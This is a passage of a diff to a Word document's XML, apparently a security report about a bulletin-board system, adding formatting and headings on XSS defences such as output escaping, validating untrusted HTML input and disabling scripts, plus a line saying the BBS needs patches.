+      <w:bookmarkStart w:id="3" w:name="Contextual_output_encoding.2Fescaping_of_string_input"/>
+      <w:bookmarkEnd w:id="3"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Contextual output encoding/escaping of string input</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="Safely_validating_untrusted_HTML_input"/>
+      <w:bookmarkEnd w:id="4"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>validating untrusted HTML input</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="Disabling_scripts"/>
+      <w:bookmarkEnd w:id="5"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Disabling scripts</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>use new tools like “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Javascript sandbox tools</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>”.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="华文行楷" w:hAnsi="华文行楷" w:eastAsia="华文行楷"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -2329,15 +4708,18 @@
           <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:before="240" w:after="0"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="72"/>
-        </w:rPr>
-        <w:t>1</w:t>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>The bbs is full of vulnerability . It needs some patch to fix the system.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2356,7 +4738,11 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="72"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -2386,8 +4772,8 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId13"/>
-      <w:footerReference w:type="default" r:id="rId14"/>
+      <w:headerReference w:type="default" r:id="rId22"/>
+      <w:footerReference w:type="default" r:id="rId23"/>
       <w:type w:val="nextPage"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:left="1134" w:right="1134" w:header="397" w:top="1134" w:footer="397" w:bottom="1134" w:gutter="0"/>
@@ -2467,7 +4853,7 @@
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
           <w:r>
-            <w:t>3</w:t>
+            <w:t>7</w:t>
           </w:r>
           <w:r>
             <w:fldChar w:fldCharType="end"/>
@@ -2497,7 +4883,7 @@
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
           <w:r>
-            <w:t>5</w:t>
+            <w:t>10</w:t>
           </w:r>
           <w:r>
             <w:fldChar w:fldCharType="end"/>
@@ -3320,6 +5706,13 @@
       <w:lang w:bidi="ar-SA"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading3">
+    <w:name w:val="Heading 3"/>
+    <w:basedOn w:val="Heading"/>
+    <w:qFormat/>
+    <w:pPr/>
+    <w:rPr/>
+  </w:style>
   <w:style w:type="character" w:styleId="DefaultParagraphFont" w:default="1">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -3328,7 +5721,7 @@
     <w:qFormat/>
     <w:rPr/>
   </w:style>
-  <w:style w:type="character" w:styleId="Style12" w:customStyle="1">
+  <w:style w:type="character" w:styleId="Style11" w:customStyle="1">
     <w:name w:val="页眉 字符"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="a3"/>
@@ -3340,7 +5733,7 @@
       <w:szCs w:val="18"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Style13" w:customStyle="1">
+  <w:style w:type="character" w:styleId="Style12" w:customStyle="1">
     <w:name w:val="页脚 字符"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="a5"/>
@@ -3368,7 +5761,7 @@
       <w:lang w:bidi="hi-IN"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Style14" w:customStyle="1">
+  <w:style w:type="character" w:styleId="Style13" w:customStyle="1">
     <w:name w:val="标题 字符"/>
     <w:link w:val="a8"/>
     <w:qFormat/>
@@ -3487,6 +5880,33 @@
       <w:color w:val="000080"/>
       <w:u w:val="single"/>
       <w:lang w:val="zxx" w:eastAsia="zxx" w:bidi="zxx"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel9">
+    <w:name w:val="ListLabel 9"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:rFonts w:eastAsia="华文行楷"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel10">
+    <w:name w:val="ListLabel 10"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:rFonts w:eastAsia="华文行楷"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel11">
+    <w:name w:val="ListLabel 11"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:rFonts w:eastAsia="华文行楷"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading">
